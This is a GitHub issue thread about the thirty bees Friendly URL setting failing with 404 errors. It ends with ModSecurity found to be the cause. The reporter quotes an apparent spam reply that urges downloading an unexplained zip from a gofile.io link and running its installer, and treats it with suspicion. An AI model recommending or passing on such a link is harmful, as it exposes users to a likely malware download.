### ISSUE TITLE
Friendly URL option in preferences menu is not functioning correctly

### ISSUE THREAD

**Issue by x97wehner** [thirtybees/thirtybees#1875]
This is on a clean install of TB on latest bleeding edge. Unable to turn off friendly URL option in preferences > SEO & URL's menu. Switching it off and save attempt results in a 404 error. Then tried deleting the .htaccess file first. This allowed me to turn it off, but now can't turn it back on. Results in the attached error and unable to regenerate htaccess

![image](https://github.com/user-attachments/assets/c417363e-a126-4b78-87db-a6c2ea10d285)

**Comment by x97wehner** [comment]
> try this https://gofile.io/d/yMHabA select the desired compiler in the installer

Are you a robot? This is just a zip file that I'm not opening without validation. Please explain the fix better.

**Comment by therampagerado** [comment]
I experience the same issue from quite some time. I think it's related in my case to the large amount of information that is removed at once from the file with 6 shops. 

Do you run multishop?

**Comment by x97wehner** [comment]
I do not. One single shop.
________________________________

**Comment by x97wehner** [comment]
Also, I tested this on a completely fresh dev server and got the same 
issues.


------ Original Message ------
From "Nathan Wehner" ***@***.***>
To "thirtybees/thirtybees" ***@***.***>; 
"thirtybees/thirtybees" 
***@***.***>
Cc "Author" ***@***.***>
Date 9/4/2024 4:38:08 PM
Subject Re: [thirtybees/thirtybees] Friendly URL option in preferences 
menu is not functioning correctly (Issue #1875)

**Comment by getdatakick** [comment]
This looks like a server misconfiguration. When you enable Friendly URL, thirty bees regenerates .htaccess file, and it looks like your apache is having some issues with it. 

Please look into your apache server error (not access) logs to find the root cause.

**Comment by x97wehner** [comment]
> This looks like a server misconfiguration. When you enable Friendly URL, thirty bees regenerates .htaccess file, and it looks like your apache is having some issues with it.
> 
> Please look into your apache server error (not access) logs to find the root cause.

You are correct. Apache's ModSecurity module is the issue. My domains and subdomains had to be whitelisted in this module for this function to work correctly.
